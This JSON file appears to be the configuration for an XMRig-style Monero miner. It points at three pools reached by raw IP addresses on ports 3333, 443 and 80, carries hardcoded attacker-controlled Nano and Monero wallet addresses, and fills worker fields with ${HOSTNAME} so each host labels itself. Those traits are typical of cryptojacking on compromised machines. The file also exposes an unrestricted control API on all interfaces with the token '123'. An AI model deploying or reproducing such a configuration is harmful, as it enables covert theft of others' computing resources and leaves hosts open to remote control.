{
    "http": {
        "enabled": true,
        "host": "0.0.0.0",
        "port": 7777,
        "access-token": 123,
        "restricted": false
    },
    "randomx": {
        "1gb-pages": true
    },
    "autosave": true,
    "cpu": true,
    "opencl": false,
    "cuda": false,
    "donate-level": 0,
    "donate-over-proxy": 0,
    "pools": [
        {
            "url": "95.217.134.205:3333",
            "rig-id": "${HOSTNAME}"
        },
        {
            "url": "161.35.34.195:443",
            "user": "nano_137u5hyk6dkwhh9ks14jsrd65ebjhhkancezqqbnbd6oppci35z6op6ji5ue.${HOSTNAME}#dari-sxnl",
            "pass": "x",
            "keepalive": true,
            "tls": true
        },
        {
            "url": "185.240.242.35:80",
            "user": "454NmpSJWcUQeiNGsRSgpBCKvgRoGqEvr18Cs5S7iMCXdtRvbf8DR3oLWo83zvho7Bd8azgkke3t5btamf2wvm76MnFMFeL",
            "pass": "${HOSTNAME}",
            "keepalive": false,
            "tls": true,
            "tls-fingerprint": "420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
        }
    ]
}
